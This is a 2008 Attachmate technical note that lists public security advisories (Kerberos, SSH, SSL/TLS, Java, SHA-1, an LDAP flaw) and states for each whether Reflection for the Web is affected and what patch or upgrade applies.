|
|
|
Security Updates and Reflection for the Web
Technical Note 1704
Last Reviewed 21-Nov-2008
Applies To
Reflection for the Web 2008 (All Editions)
Reflection for the Web version 8.0 through 9.6
Summary
Technical Note 1704
Last Reviewed 21-Nov-2008
Applies To
Reflection for the Web 2008 (All Editions)
Reflection for the Web version 8.0 through 9.6
Summary
This technical note discusses security issues related to Reflection for the Web. If you are using this product, you should consult this technical note on a regular basis for any updated information regarding this product.
IMPORTANT: The security for Reflection for the Web depends upon the security of the operating system, host, and network environment. We strongly recommend that you evaluate and implement all relevant security service packs, updates, and patches recommended by your operating system, host, Java Virtual Machine, and network manufacturers.
This document is organized in the following sections:
Reflection for the Web and Security
Security Alerts and Advisories
Your Operating System and Virtual Machine Security Pages
Security Alerts and Advisories
Your Operating System and Virtual Machine Security Pages
Reflection for the Web and Security
This section provides information about security updates related to Reflection for the Web security features and provides information regarding security fixes and known issues.
The following table lists security information regarding other Reflection products.
| Product Name |
Security Technical Note |
| All Reflection Products |
1700 |
| Reflection for HP Reflection for UNIX and OpenVMS Reflection for ReGIS Graphics Reflection for IBM Reflection X Reflection for Secure IT Windows Client 6.x |
1708 |
| Reflection for Secure IT F-Secure SSH |
2288 |
Reporting a Potential Security Vulnerability to Attachmate
If you are aware of a potential security vulnerability in Attachmate's Reflection products that is not listed on this document, see Technical note 1890 for details about reporting the issue to the Attachmate Computer Emergency Response Team (CERT).
Current Version
For information about the current version of Attachmate products, see the Product Support Lifecycle at http://support.attachmate.com/programs/lifecycle/.
Product Updates
To determine if any updates are available for the current version of your Reflection product, see Technical Note 1619, Reflection Patch Topics.
Security Alerts and Advisories
The following security alerts and advisories may affect your Reflection for the Web installation, or the security of your operating system or Java Virtual Machine. We recommend that you review these alerts and advisories.
Note: This information is non-inclusive—it does not attempt to address all security issues that may affect your system.
| Alert |
Vulnerability Advisory CPNI-957037 |
| Date Posted |
October 2008 |
| Summary |
A design flaw in the SSH protocol use of block ciphers in cipher block chaining mode could allow an attacker to recover up to four bytes of plaintext. Although the severity of the attack is considered high, the likelihood of a successful attack is considered low and results in terminating the user’s SSH connection. |
| Product Status |
For more information about how this vulnerability affects Attachmate products, see Technical Note 2398. |
| Additional Information |
For details, see the Combined Security Incident Response Team - United Kingdom web site at http://www.cpni.gov.uk/Products/3716.aspx. |
| Alert |
US-CERT Vulnerability Note VU #419344 |
| Date Posted |
April 2007 |
| Summary |
An authenticated user may be able to execute arbitrary code on a host running kadmind. Successful exploitation can compromise the Kerberos key database and host security on the host running these programs. (kadmind and the KDC typically run as root.) Unsuccessful exploitation attempts will likely result in the affected program crashing. Third-party applications calling either the RPC library or the GSS-API library provided with MIT krb5 may be vulnerable. |
| Product Status |
Attachmate products (including NetIQ products) are not vulnerable. |
| Additional Information |
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/419344. |
| Alert |
US-CERT Vulnerability Note VU #704024 |
| Date Posted |
April 2007 |
| Summary |
A buffer overflow exists in the krb5_klog_syslog() function used by kadmind and the KDC. An authenticated user may be able to execute arbitrary code on a host running kadmind. An authenticated user may be able to execute arbitrary code on KDC host. Also, a user controlling a Kerberos realm sharing a key with the target realm may be able to execute arbitrary code on a KDC host. Successful exploitation can compromise the Kerberos key database and host security on the host running these programs. (kadmind and the KDC typically run as root.) Unsuccessful exploitation attempts will likely result in the affected program crashing. Third-party applications calling krb5_klog_syslog() may also be vulnerable. |
| Product Status |
Attachmate products (including NetIQ products) are not vulnerable. |
| Additional Information |
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/704024. |
| Alert |
US-CERT Vulnerability Note VU #220816 |
| Date Posted |
April 2007 |
| Summary |
A remotely-exploitable root vulnerability is present in an application which ships in the krb5 sources. |
| Product Status |
Attachmate products (including NetIQ products) are not vulnerable. |
| Additional Information |
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/220816. |
| Alert |
US-CERT Vulnerability Note VU #831452: Kerberos administration daemon may free uninitialized pointers |
| Date Posted |
April 2007 |
| Summary |
An unauthenticated user may cause execution of arbitrary code in the Kerberos administration daemon, "kadmind", by causing it to free uninitialized pointers which should have been initialized by the GSS-API library. Compromise of the Kerberos key database may result. Third-party server applications written using the GSS-API library provided with MIT krb5 may also be vulnerable. Affected releases are krb5-1.5 through krb5-1.5.1. |
| Product Status |
Attachmate products (including NetIQ products) are not vulnerable. |
| Additional Information |
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/831452. |
| Alert |
US-CERT Vulnerability Note VU #845620 |
| Date Posted |
September 5, 2006 |
| Summary |
Multiple RSA implementations fail to properly handle signatures. |
| Product Status |
Attachmate has determined that the usage of the RSA digital signature algorithm in Reflection for the Web is not subject to this vulnerability. |
| Additional Information |
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/845620. |
| Alert |
US-CERT Vulnerability Note VU#680620 |
| Date Posted |
July 14, 2005 |
| Summary |
Buffer overflow vulnerability in versions 1.2.1 and 1.2.2 of the zlib data compression library inflate() routine. |
| Product Status |
Reflection for the Web does not use zlib and is not subject to this vulnerability. |
| Additional Information |
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/680620. |
| Alert |
Multiple iDEFENSE Security Advisories/US-CERT Vulnerability Note VU#800829 |
| Date Posted |
July 7, 2005 |
| Summary |
Multiple vendor telnet client information disclosure vulnerabilities. |
| Product Status |
Reflection for the Web Telnet clients are not vulnerable to these issues as they return limited terminal information in response to the NEW_ENVIRONMENT command and use dynamically-sized buffering. |
| Additional Information |
For details about these vulnerabilities, see the iDefense or US-Cert articles listed below. iDefense: http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities http://www.idefense.com/application/poi/display?id=220&type=vulnerabilities http://www.idefense.com/application/poi/display?id=221&type=vulnerabilities US-CERT: http://www.kb.cert.org/vuls/id/800829 |
| Alert |
Sun(sm) Alert Notification - Document ID 101749 |
| Summary |
Java Runtime Environment security vulnerability. |
| Additional Information |
This alert describes a Java Runtime Environment vulnerability that may enable an untrusted applet to increase its system privileges. For further details and links to Java updates, see http://sunsolve.sun.com/search/document.do?assetkey=1-26-101749-1. |
| Alert |
Sun(sm) Alert Notification - Document ID 101748 |
| Summary |
Java Web Start security vulnerability. This alert describes a Java Web Start vulnerability that may enable an untrusted application to increase its system privileges. |
| Additional Information |
For further details and links to Java update, see http://sunsolve.sun.com/search/document.do?assetkey=1-26-101748-1. |
| Alert |
Announcement of Successful Cryptanalytic Attack on SHA-1 |
| Summary |
Three Chinese cryptanalysts from Shandong University have recently documented a successful cryptanalytic attack on the SHA-1 algorithm. |
| Product Status |
Reflection products primarily use SHA-1 to create HMACs (Keyed Hashing for Message Authentication), for verification of message integrity. According to Schneier, because hash collisions are not a prominent concern, this use of SHA-1 is not affected by the cryptanalytic attack. (For further details, read the blog posting at http://www.schneier.com/blog/archives/2005/02/sha1_broken.html.) In next several versions of products that use the SHA-1 algorithm, all vendors—including Attachmate, will likely move to phase out the use of SHA-1 hashes for use in digital signatures and add support for SHA-256 and other stronger hashing algorithms. |
| Additional Information |
Bruce Schneier, the author of "Applied Cryptography," discusses this announcement on his blog, Schneier on Security. For commentary on this topic, see Mr. Schneier's blog at http://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html. |
| Alert |
Sun(sm) Alert Notification - Document ID 57591 |
| Summary |
Security Vulnerability With Java Plug-in in JRE/SDK. This Java security vulnerability affects Sun's Java Virtual Machine (JVM) when it is used to run Java applets in a web browser on a client machine. If you have client machines using an affected version of the JVM to run Java applets in a web browser, we recommend that you download and install an updated version of the JVM (see the above link for details). |
| Product Status |
The Reflection management server is installed with Reflection for the Web and Reflection Administrator. The automated installer installs the management server with a private copy of a Sun Java Runtime Environment (JRE). In a default installation (using the automated installer), the JRE installed with Reflection cannot be invoked by a local web browser on the server machine to run a Java applet and is therefore not affected by the problem cited in this alert. However, if the JRE installation has been modified so that the JRE can be invoked by a local web browser on the server machine to run a Java applet, or if untrusted Java software has been configured to use this JRE, then we recommend that you download and install an updated version of the JRE (see the above link for details). |
| Additional Information |
For details, see http://sunsolve.sun.com/search/document.do?assetkey=1-26-57591-1. |
| Alert |
US-CERT Technical Cyber Security Alert TA04-247A |
| Summary |
The vulnerabilities described in Security Alert TA04-247A (VU#866472, VU#795632, VU#550464, and VU#350792) are not applicable to Reflection for the Web. |
| Additional Information |
For details about this security alert, see http://www.us-cert.gov/cas/techalerts/TA04-247A.html. |
| Alert |
US-CERT Technical Cyber Security Alert TA04-104A |
| Summary |
Microsoft has released four security bulletins listing vulnerabilities that affect Microsoft Windows and its components. |
| Product Status |
The vulnerabilities described in these bulletins are directly related to Microsoft products. However, because they may affect the Windows operating system or other software, Reflection for the Web may be indirectly impacted. Therefore, we recommend that users download and apply the critical update patch available from Microsoft at http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx. Note: Patch MS04-011 replaces Microsoft patch MS04-007 described in US-CERT Advisory TA04-041A (see below). |
| Additional Information |
For details, see http://www.us-cert.gov/cas/techalerts/TA04-104A.html. |
| Alert |
US-CERT Technical Cyber Security Alert TA04-041A |
| Summary |
Multiple Vulnerabilities in Microsoft ASN.1 Library. |
| Product Status |
Reflection for the Web does not use the library identified by Microsoft as containing the ASN.1 vulnerability. However, this library can affect the Windows operating system or other software, which can affect Reflection for the Web. Therefore, we recommend that users download and apply the critical update patch available from Microsoft at http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx. |
| Additional Information |
For details, see http://www.us-cert.gov/cas/techalerts/TA04-041A.html. |
| Alert |
CERT Advisory CA-2003-26 |
| Summary |
Multiple Vulnerabilities in SSL/TLS Implementations. |
| Product Status |
Attachmate has inspected Reflection for the Web and determined that it is not vulnerable to the issues addressed in this alert. |
| Additional Information |
For details, see http://www.cert.org/advisories/CA-2003-26.html. |
| Alert |
CERT Advisory CA-2002-36 |
| Summary |
Vulnerabilities in SSH2 Implementations from Multiple Vendors. |
| Product Status |
Attachmate has tested Reflection for the Web with the provided test suite and found that it is not vulnerable to the SSH2 connection initialization, key exchange, and negotiation phase attacks. |
| Additional Information |
For details, see http://www.cert.org/advisories/CA-2002-36.html. |
| Alert |
CERT Advisory CA-2003-24 |
| Summary |
Buffer Management Vulnerability in OpenSSH. |
| Product Status |
Reflection for the Web does not use OpenSSH and is not affected by this issue. |
| Additional Information |
For details, see http://www.cert.org/advisories/CA-2003-24.html. |
| Alert |
Microsoft Security Bulletin MS02-052 |
| Summary |
Microsoft Java Virtual Machine JDBC classes and code execution. |
| Product Status |
If you are using Reflection for the Web version 5.0, review this bulletin. |
| Additional Information |
For details, see http://www.microsoft.com/technet/security/bulletin/MS02-052.mspx. |
| Alert |
Reflection for the Web version 5.1.068 - 5.1.530 and 6.0.111 - 6.01.514: LDAP vulnerability |
| Summary |
There is a security vulnerability in the LDAP access control feature. |
| Product Status |
Reflection for the Web versions 5.1.068 through 5.1.530 and 6.0.111 through 6.01.514 are affected. Versions 5.0 and earlier are not affected. Patches are no longer available for these product versions; we recommend upgrading to the current version. To determine what version of Reflection for the Web you are running, log in to the Administrative WebStation, click Resources, and then click About Reflection for the Web. Version 5.0: Reflection for the Web with SSL and Certificate Authority (CA) signed certificates. For SSL, Reflection for the Web uses self-signed certificates by default. However, the product can also be configured to use CA-signed certificates. CA-signed certificates require an additional verification of the certificate chain attributes. This verification is not performed in the Reflection for the Web 5.0 security proxy server. This does not affect the Reflection for the Web management server. However, if you plan to use CA-signed certificates to provide encrypted sessions between the Reflection for the Web applets and the Reflection for the Web security proxy server, We recommend that you upgrade to version 5.1 or higher before configuring Reflection in this manner. |
Your Operating System and Virtual Machine Security Pages
This section provides links to security information found on the web sites of common operating systems and virtual machines that may be of interest for Reflection for the Web users. This information is non-inclusive—it does not include all operating systems, nor does it include all links to information that may impact the security of your operating system.
Apple: http://www.info.apple.com/usen/security/security_updates.html
Debian Linux: http://www.debian.org/security/
HP (Compaq): http://www1.itrc.hp.com/service/home/home.do (Note: This site requires registration.)
IBM: http://www-1.ibm.com/servers/eserver/support/zseries/
Microsoft: http://www.microsoft.com/technet/security/current.aspx
Red Hat Linux: https://www.redhat.com/security/
Sun Microsystems: http://sunsolve.sun.com/pub-cgi/show.pl?target=security/sec
Notice: This technical note is updated from time to time and is provided for informational purposes only. Attachmate makes no representation or warranty that the functions contained in our software products will meet your requirements or that the operation of our software products will be interruption or error free. Attachmate EXPRESSLY DISCLAIMS ALL WARRANTIES REGARDING OUR SOFTWARE INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
